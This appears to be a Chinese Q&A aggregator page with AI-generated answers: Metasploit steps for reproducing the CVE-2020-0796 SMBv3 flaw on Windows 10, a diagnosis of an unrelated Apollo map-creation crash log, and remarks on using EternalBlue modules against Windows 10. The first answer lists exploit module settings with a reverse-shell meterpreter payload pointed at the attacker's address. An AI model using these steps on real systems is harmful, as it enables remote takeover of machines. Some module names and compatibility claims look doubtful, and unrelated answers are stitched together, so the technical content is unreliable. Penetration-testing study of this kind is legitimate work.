msf win10漏洞_永恒之黑:CVE20200796漏洞复现
时间: 2023-09-10 14:12:50 浏览: 106
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒之黑”漏洞),我可以为您提供一些指导。
首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。
其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。
最后,您可以按照以下步骤进行CVE-2020-0796漏洞的复现:
1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。
2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置:
set RHOSTS [目标IP地址]
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [攻击机IP地址]
3. 运行exploit命令,进行漏洞利用。
请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。
相关问题
root@in_dev_docker:/apollo# bash scripts/msf_create_lossless_map.sh /apollo/hdmap/pcd_apollo/ 50 /apollo/hdmap/ /apollo/bazel-bin WARNING: Logging before InitGoogleLogging() is written to STDERR E0715 22:08:35.399576 6436 lossless_map_creator.cc:162] num_trials = 1 Pcd folders are as follows: /apollo/hdmap/pcd_apollo/ Resolution: 0.125 Dataset: /apollo/hdmap/pcd_apollo Dataset: /apollo/hdmap/pcd_apollo/ Loaded the map configuration from: /apollo/hdmap//lossless_map/config.xml. Saved the map configuration to: /apollo/hdmap//lossless_map/config.xml. Saved the map configuration to: /apollo/hdmap//lossless_map/config.xml. E0715 22:08:35.767315 6436 lossless_map_creator.cc:264] ieout_poses = 1706 Failed to find match for field 'intensity'. Failed to find match for field 'timestamp'. E0715 22:08:35.769896 6436 velodyne_utility.cc:46] Un-organized-point-cloud E0715 22:08:35.781770 6436 lossless_map_creator.cc:275] Loaded 245443D Points at Trial: 0 Frame: 0. F0715 22:08:35.781791 6436 base_map_node_index.cc:101] Check failed: false *** Check failure stack trace: *** scripts/msf_create_lossless_map.sh: line 11: 6436 Aborted (core dumped) $APOLLO_BIN_PREFIX/modules/localization/msf/local_tool/map_creation/lossless_map_creator --use_plane_inliers_only true --pcd_folders $1 --pose_files $2 --map_folder $IN_FOLDER --zone_id $ZONE_ID --coordinate_type UTM --map_resolution_type single root@in_dev_docker:/apollo# bash scripts/msf_create_lossless_map.sh /apollo/hdmap/pcd_apollo/ 50 /apollo/hdmap/
根据提供的信息,执行脚本 `scripts/msf_create_lossless_map.sh` 时出现了错误。具体的错误信息如:
```
E0715 22:08:35.399576 6436 lossless_map_creator.cc:162] num_trials = 1
Pcd folders are as follows:
/apollo/hdmap/pcd_apollo/
Resolution: 0.125
Dataset: /apollo/hdmap/pcd_apollo
Dataset: /apollo/hdmap/pcd_apollo/
Loaded the map configuration from: /apollo/hdmap//lossless_map/config.xml.
Saved the map configuration to: /apollo/hdmap//lossless_map/config.xml.
Saved the map configuration to: /apollo/hdmap//lossless_map/config.xml.
E0715 22:08:35.767315 6436 lossless_map_creator.cc:264] ieout_poses = 1706
Failed to find match for field 'intensity'.
Failed to find match for field 'timestamp'.
E0715 22:08:35.769896 6436 velodyne_utility.cc:46] Un-organized-point-cloud
E0715 22:08:35.781770 6436 lossless_map_creator.cc:275] Loaded 245443D Points at Trial: 0 Frame: 0.
F0715 22:08:35.781791 6436 base_map_node_index.cc:101] Check failed: false
*** Check failure stack trace: ***
scripts/msf_create_lossless_map.sh: line 11: 6436 Aborted (core dumped) $APOLLO_BIN_PREFIX/modules/localization/msf/local_tool/map_creation/lossless_map_creator --use_plane_inliers_only true --pcd_folders $1 --pose_files $2 --map_folder $IN_FOLDER --zone_id $ZONE_ID --coordinate_type UTM --map_resolution_type single
```
这段错误信息表明在执行脚本时发生了一个检查失败的情况。错误的具体位置在 `base_map_node_index.cc:101`。可能的原因包括:
1. 数据不匹配:脚本中使用的数据可能存在不匹配的情况,例如字段名或者数据格式不正确。
2. 数据文件缺失:脚本所需的某些数据文件可能不存在或者路径不正确。
3. 依赖问题:脚本所依赖的某些组件或库可能缺失或者版本不兼容。
请检查脚本 `scripts/msf_create_lossless_map.sh` 中的相关代码,确保数据文件和依赖项的正确性。如果问题仍然存在,您可以提供更多的上下文信息,以便我们能够更好地帮助您解决问题。
msf永恒之蓝攻击win10
根据提供的引用内容,永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统最高权限的攻击方式。然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统的攻击。永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。
如果你想在Metasploit Framework中使用永恒之蓝攻击模块对Windows 10进行攻击,你需要使用另外一个模块,如`ms17_010_psexec`或`ms17_010_eternalromance`等。这些模块允许利用永恒之蓝漏洞攻击Windows 10系统。
请注意,进行任何形式的攻击都是非法的,除非你有合法的授权并且在合法和合规的环境中进行。我强烈建议遵守法律和道德准则,避免从事非法活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *2* *3* [经典利用永恒之蓝漏洞对Windows操作系统进行攻击](https://blog.csdn.net/qq_46202048/article/details/121535176)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"]
[ .reference_list ]